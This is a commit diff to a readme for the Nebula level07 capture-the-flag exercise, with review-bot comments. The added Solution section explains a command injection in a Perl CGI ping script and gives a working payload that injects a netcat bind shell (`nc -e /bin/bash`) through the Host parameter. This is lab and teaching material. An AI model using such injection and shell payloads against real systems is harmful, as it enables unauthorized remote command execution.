Commit ed47afd
Changed files (1)
exploit_exercises/nebula/level07/readme.md
@@ -1,11 +1,12 @@
+# Nebula - level07 - Vulnerable HTTP Parameter Input
-----------------------------------------------
-
-Source code
+## About
The flag07 user was writing their very first perl program that allowed them
to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password
level07. Files for this level can be found in /home/flag07.
+
+```
#!/usr/bin/perl
use CGI qw{param};
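Review bot: The opening code fence added just above `#!/usr/bin/perl` has no language tag; add `perl` after the fence marker so the script is highlighted consistently. The new title "Vulnerable HTTP Parameter Input" also does not name the bug class. The Solution section describes shell command execution driven by the `Host` parameter, so a title along the lines of "OS command injection via the Host parameter" would be more precise and easier to search for.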
@@ -21,9 +22,20 @@ sub ping {
foreach $line (@output) { print "$line"; }
print("</pre></body></html>");
-
+
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
+```
+
+## Solution
+
+The line `@output = 'ping -c 3 $host 2>&1';` uses unsanitized user input to execute a command in a
+shell. To craft `$host` into a useful parameter, consider `ping -c 3 $IP; nc.traditional -lkp 8080
+-e /bin/bash;`. With this in mind, create an HTTP GET request with `Host` as the parameter:
+`wget http://127.0.0.1:7007/index.cgi?HOST=\'127.0.0.1; nc.traditional -lkp 8080 -e
+"/bin/bash"; #\'`
+The port *7007* and the path to `index.cgi` come from `/home/flag07/thttpd.conf`.
+Use `nc 127.0.0.1 8080` to connect to the shell.
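Review bot: In the first sentence of the Solution, the quoted line `@output = 'ping -c 3 $host 2>&1';` uses single quotes, which in Perl produce a non-interpolated string literal and run nothing. The behaviour the text describes needs the backtick (or `qx`) form, so quote the line exactly as it appears in the script and use double-backtick delimiters for the inline code so the inner backticks survive Markdown rendering. The request also spells the parameter `HOST=` while the context line reads `param("Host")` and the prose says `Host`; pick one spelling. The section would be more useful if it closed with the fix as well: validate `Host` against a hostname or IP pattern, and invoke ping through the list form of `system` or `open` so no shell ever parses the value. The whitespace-only change before the closing `}` of `ping` can be dropped from the commit.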